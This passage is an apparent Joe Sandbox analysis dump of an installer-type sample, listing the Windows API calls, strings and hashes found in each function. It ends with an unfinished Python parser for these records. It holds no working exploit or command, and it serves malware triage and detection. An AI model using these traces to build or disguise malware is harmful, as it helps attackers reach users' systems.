                                                                                                              • Part of subcall function 004059E0: CharNextW.USER32(00000000), ref: 004059F3
                                                                                                              • Part of subcall function 004059E0: CharNextW.USER32(00000000), ref: 00405A0B
                                                                                                            • CreateDirectoryW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                                                                            • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                                                                            • GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,00435000,?,00000000,000000F0), ref: 00401630
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 3751793516-0
                                                                                                            • Opcode ID: ab4beae8261b44de63f604e0a73f5b1755ddd155d8cc8e63c414e47e0b3a8ad9
                                                                                                            • Instruction ID: 793db7a5d63411832aed35bcc9698a3b838560232fc9f0aff2bd133e4d1ca9b1
                                                                                                            • Opcode Fuzzy Hash: ab4beae8261b44de63f604e0a73f5b1755ddd155d8cc8e63c414e47e0b3a8ad9
                                                                                                            • Instruction Fuzzy Hash: 8E11C271904100EBDF206FA0CD449AF7AB4FF14369B34463BF882B62E1D23D4941DA6E
                                                                                                            APIs
                                                                                                            • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                                                                            • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                                                                            • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                                                              • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 1404258612-0
                                                                                                            • Opcode ID: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
                                                                                                            • Instruction ID: 0d64a3d5d22a86ce83a9b45ae5cd800923300da454a86426803db7941f711343
                                                                                                            • Opcode Fuzzy Hash: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
                                                                                                            • Instruction Fuzzy Hash: 76113675A00208AFDB00DFA5C945DAEBBB9EF04344F20407AF905F62A1D7349E50CB68
                                                                                                            APIs
                                                                                                              • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                              • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                              • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                              • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                              • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                              • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                              • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                              • Part of subcall function 00405665: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 0040568A
                                                                                                              • Part of subcall function 00405665: CloseHandle.KERNEL32(?), ref: 00405697
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                                                            • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                            • String ID:
                                                                                                            • API String ID: 3585118688-0
                                                                                                            • Opcode ID: d15ae0a482c79c0d8e7c95f8c2190dddee124483964ec219d5696f0573d40edc
                                                                                                            • Instruction ID: 1710045f99402437403c6baccff52884d9c8abed8acdccfc98223cb8aca5cd2d
                                                                                                            • Opcode Fuzzy Hash: d15ae0a482c79c0d8e7c95f8c2190dddee124483964ec219d5696f0573d40edc
                                                                                                            • Instruction Fuzzy Hash: DC11A171D04204EBCF109FA0CD459DE7AB5EB04318F20447BE505B61E0C3798A82DF99
                                                                                                            APIs
                                                                                                            • IsWindowVisible.USER32(?), ref: 00405137
                                                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 00405188
                                                                                                              • Part of subcall function 0040417B: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                            • Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                                                                            • Instruction ID: e96fcdb8fef6e8ad8397e3324e9c6cbe2a99463e9dbc89d2689884753c01e048
                                                                                                            • Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                                                                            • Instruction Fuzzy Hash: 9C019E71A00608AFDF215F11DD84FAB3A26EB84354F104136FA007E2E0C37A8C929E69
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00405BA3
                                                                                                            • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403358,00436000,00436800), ref: 00405BBE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountFileNameTempTick
                                                                                                            • String ID: nsa
                                                                                                            • API String ID: 1716503409-2209301699
                                                                                                            • Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                                                                            • Instruction ID: ce32066b90f2dd5c00c4c21114408b385ae8a9c1cc04399698be8057c3d71d7e
                                                                                                            • Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                                                                            • Instruction Fuzzy Hash: B7F09676A00204BBDB008F59DC05F9BB7B9EB91710F10803AE901F7180E2B0BD40CB64
                                                                                                            APIs
                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 0040568A
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00405697
                                                                                                            Strings
                                                                                                            • Error launching installer, xrefs: 00405678
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                            • String ID: Error launching installer
                                                                                                            • API String ID: 3712363035-66219284
                                                                                                            • Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                                                                            • Instruction ID: c7c859a2db999ab7639828e98f3e535764a8332e37e79a8a612d2f3195062982
                                                                                                            • Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                                                                            • Instruction Fuzzy Hash: 19E0ECB4A01209AFEB009F64EC49A6B7BBCEB00744B908921A914F2250D778E8108A7D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fe49718026384e2f2d8d8d283f1539e894bec1c05f027991fc18b2b3d3b0abdf
                                                                                                            • Instruction ID: 0bcb7f2cf841bf472a0df6abca0e2eee6c891e9108e2cead3d2ea24e9771fd10
                                                                                                            • Opcode Fuzzy Hash: fe49718026384e2f2d8d8d283f1539e894bec1c05f027991fc18b2b3d3b0abdf
                                                                                                            • Instruction Fuzzy Hash: D6A15671E00229CBDF28CFA8C854BADBBB1FF44305F15816AD856BB281C7785A96DF44
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7c1b3bbb7fb5d360c352e29dce0ca82793dba8b39a20caf6091836a7e5acd446
                                                                                                            • Instruction ID: 5ff8dc76d646c522b35349404ae71f3a07db7e5a5a41cf42f501ef55767b32d6
                                                                                                            • Opcode Fuzzy Hash: 7c1b3bbb7fb5d360c352e29dce0ca82793dba8b39a20caf6091836a7e5acd446
                                                                                                            • Instruction Fuzzy Hash: DD913470E04229CBEF28CF98C8547ADBBB1FF44305F15816AD852BB291C7789996DF44
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 06a588dc36723823e64c1d76eb6b79df0e0f5c7b74692a20a357622d355e40c3
                                                                                                            • Instruction ID: bb31d40f455f6cff8f0b7d4569728449f81f985eb729d97d8cba9c35205a948c
                                                                                                            • Opcode Fuzzy Hash: 06a588dc36723823e64c1d76eb6b79df0e0f5c7b74692a20a357622d355e40c3
                                                                                                            • Instruction Fuzzy Hash: A6814471E04228CBDF24CFA8C844BADBBB1FF44305F25816AD456BB281C7789996DF44
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 72aa8ec3dd0942b5b71c471d9b9626f4b4465e3dfbf4f8c787812f56ef585442
                                                                                                            • Instruction ID: e59bb743c0d69fedc8ec9c1b53f92d0ee49f9853fc7f4c6d73f4ee5c7875ed1f
                                                                                                            • Opcode Fuzzy Hash: 72aa8ec3dd0942b5b71c471d9b9626f4b4465e3dfbf4f8c787812f56ef585442
                                                                                                            • Instruction Fuzzy Hash: FE816671E04228DBDF24CFA8C8447ADBBB0FF44305F15816AD856BB281C7786996DF44
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1d7d6eeb6ae866c31b6fd6fb1bb683d5497ea3b6253a7880f6caf84b5ad72384
                                                                                                            • Instruction ID: 9556348457f1f5f1301c48e47fc8538a45dff02eab8277f34011f15b85b09a92
                                                                                                            • Opcode Fuzzy Hash: 1d7d6eeb6ae866c31b6fd6fb1bb683d5497ea3b6253a7880f6caf84b5ad72384
                                                                                                            • Instruction Fuzzy Hash: 43711271E00228DBDF28CF98C854BADBBB1FF48305F15806AD816BB281C7789996DF54
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 55af2c983f537d9a3a53cfac4a449f3e0c8fe7d310f5448a54a9ff87f60f3244
                                                                                                            • Instruction ID: ef61438920200bd82941886013112b5956151ce3a95704f571d29bdd470ffe0d
                                                                                                            • Opcode Fuzzy Hash: 55af2c983f537d9a3a53cfac4a449f3e0c8fe7d310f5448a54a9ff87f60f3244
                                                                                                            • Instruction Fuzzy Hash: FF713571E00228DBDF28CF98C854BADBBB1FF44305F15806AD856BB291C7789996DF44
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 720b16b0405195766e324cd34a7adf45238a3bda3f5e9f89198b3f7d2eee93b7
                                                                                                            • Instruction ID: 0528ad5c4640a45b82c18dce6d1929194436f5f2edf35a138e23b2c729619556
                                                                                                            • Opcode Fuzzy Hash: 720b16b0405195766e324cd34a7adf45238a3bda3f5e9f89198b3f7d2eee93b7
                                                                                                            • Instruction Fuzzy Hash: AD714671E00228DBDF28CF98C854BADBBB1FF44305F15806AD816BB291C778AA56DF44
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Xq$Xq$Xq$Xq
                                                                                                            • API String ID: 0-3965792415
                                                                                                            • Opcode ID: 4f7897a2c8051ba29aa466395f44a5ccac91187d7ee9974b215acd82e4973cca
                                                                                                            • Instruction ID: e328931ee99707c7884afb88e86302cf9fa3491a19e217a1ba287b55c15ebacf
                                                                                                            • Opcode Fuzzy Hash: 4f7897a2c8051ba29aa466395f44a5ccac91187d7ee9974b215acd82e4973cca
                                                                                                            • Instruction Fuzzy Hash: BC313E30E0131A9BDBA48BA984553EEB7F6AB94310F1541AB8459A7351EF70CD81CBA2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: \;q$\;q$\;q$\;q
                                                                                                            • API String ID: 0-2933265366
                                                                                                            • Opcode ID: 4d173b14cf6b6b13e8a3b0ce88656275ad5315f9d496418c3a1b9751a841507a
                                                                                                            • Instruction ID: 986723572c48a9190014077759de95e09e56a89f1fef5824a1d48d012288535d
                                                                                                            • Opcode Fuzzy Hash: 4d173b14cf6b6b13e8a3b0ce88656275ad5315f9d496418c3a1b9751a841507a
                                                                                                            • Instruction Fuzzy Hash: EB014831700A15CFC7748A2DC875E29B3E6AF897727254167D806CB364DA71DC4197A1
                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
                                                                                                            • lstrcmpiA.KERNEL32(00405CF5,00000000), ref: 00405AE3
                                                                                                            • CharNextA.USER32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF4
                                                                                                            • lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 190613189-0
                                                                                                            • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                            • Instruction ID: dad0a046b028959ebe33103b56e1cab2fddac0818810981e259aca52f0e6fc56
                                                                                                            • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                            • Instruction Fuzzy Hash: 59F06232608558BFC712DFA5DD40D9FBBA8DF06260B2540B6F801F7251D674FE019BA9
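The per-function records above (APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity) are only useful for hunting once they are machine-readable: which imports each function calls, which recovered strings it references, and whether it lives in the PE-backed image at 0x400000 or in the unmapped region at 0xD0000 that holds the unpacked stage. The parser below is an added example written for this page; it is not Joe Sandbox code and does not use any Joe Sandbox API. The sample input is constructed by copying three records from the listing above with the extraction indentation removed, and the record layout it assumes (bullet items under those five headings, each record closed by its Instruction Fuzzy Hash line) is inferred from this page only.

```python
"""Parse Joe Sandbox per-function records into structured data for triage."""
import re
from collections import defaultdict

# Constructed sample: three records copied from the listing above, de-indented.
SAMPLE = """APIs
• CloseHandle.KERNEL32(?), ref: 00405697
Strings
• Error launching installer, xrefs: 00405678
Memory Dump Source
• Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
Similarity
• API ID: CloseCreateHandleProcess
• String ID: Error launching installer
• API String ID: 3712363035-66219284
• Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
• Instruction ID: c7c859a2db999ab7639828e98f3e535764a8332e37e79a8a612d2f3195062982
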